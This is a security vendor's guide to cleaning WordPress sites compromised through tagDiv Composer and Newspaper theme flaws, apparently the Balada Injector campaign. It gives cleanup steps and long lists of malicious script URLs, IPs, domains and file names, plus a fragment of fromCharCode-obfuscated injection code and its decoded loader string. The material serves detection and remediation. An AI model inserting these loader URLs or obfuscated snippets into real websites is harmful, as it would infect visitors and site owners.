How to Clean tagDiv Composer Malware

By Adrian StoianGuides

According to the PublicWWW engine, there are approx. 81513 sites using the Newspaper theme and tagDiv plugin – more than 4600 sites still show signs of contamination.

MAGEFIX SecurityMalware cleanup & protection

Try our Free site check.

How to clean a website affected by tagDiv and Newspaper vulnerabilities.

  1. Backup the infected site, including database and web files – keep everything, including any suspicious file.
  2. Restore core files, plugins and themes, one by one, manually, making sure you’ll not use any files from the backup – start fresh. You may restore wp-config.php after a quick check.
  3. Make sure the /uploads/ folder is malware-free, look for .php & .zip files.
  4. After you got back a working WordPress site, check the dashboard and remove any suspicious admin users.
  5. Backup and review the wp_options table, it should include obfuscated code. Find and remove any malicious injection.
  6. Ask for a reindex via Google search console.
  7. Apply all the security updates available and use PHP version 7.4 or greater.
  8. Use Search Replace DB ver. 4.1.3 to replace malicious code inside wp_options.
  9. Scan all the sites hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup process for each.

If you seek professional help with cleanup and security updates, check our Platinum plan.
Magefix Platinum

Malicious URLs:
https://assets.statisticscripts.com/ats/s.js
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
hxxps://good.playerofsunshine[.]com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com

Malicious IPs: 45.140.146.101, 185.39.206.161, 80.66.79[.](247|253) Hyper Hosting SRL

45.140.146.101 > cdn.specialtaskevents.com
45.142.212.163 ( AS44477 )
assets.statisticscripts.com/ats/s.js
for.getsmallcount.com
css.statisticscripts.com
best.playerofsunshine.com
call.getsmallcount.com
five.startperfectsolutions.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
listwithstats.com
one.dataofpages.com
normal.playerofsunshine.com
dataofpages.com
good.playerofsunshine.com
statisticscripts.com
try.selectofmychoices.com
two.startperfectsolutions.com
view.listwithstats.com
js.statisticscripts.com
assets.statisticscripts.com
great.playerofsunshine.com
reget.statisticsplatform.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
new.listwithstats.com
cdn.statisticscripts.com
second.gybritanalytsesystem.com
slash.dataofpages.com
fifth.gybritanalytsesystem.com
four.startperfectsolutions.com
post.listwithstats.com
first.gybritanalytsesystem.com
first.dataofpages.com
page.listwithstats.com
one.startperfectsolutions.com
excelent.playerofsunshine.com
cdn.dataofpages.com

Malicious subdomains

80.66.79.250
store.bestselllerservice.com

80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com

80.66.79.252
service.specialcraftbox.com
call.colorschemeas.com
soft.specialcraftbox.com
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com

80.66.79.253
start.selectchoise.com
finish.selectchoise.com
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com
east.statisticsplatform.com
west.statisticplatform.com
west.statisticsplatform.com

80.66.79.249
special.beatifulllhistory.com

80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com

80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com

Other domains used to inject malware inside the “tdw-css-placeholder” section. All are blacklisted by Sucuri Labs.
fast.quickcontentnetwork.com
gll.metricaga.com
ga.cdzanalytics.com
cdn.metricastats.com
syndication.gcdnanalytics.com

fromCharCode obfuscated code inside tdw-css-placeholder:
[‘fr’+’om’+String.fromCharCode(67

Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js

Reddit

wp-zexit
byu/cdbessig inWordPress

SiteCheck Sucuri
Malware Found, Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59
Resource from a blacklisted domain fast.quickcontentnetwork.com

Decoded

CharCodemCharCriptateElementrcidntScriptentNodeertBeforeementsByTagNameadendChildmp_weather_scripthttps://assets.statisticscripts.com/ats/s.js

How this malware works:

Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins

Twitter @500mk500

Decoded malware

Need help?

Try our Free site check.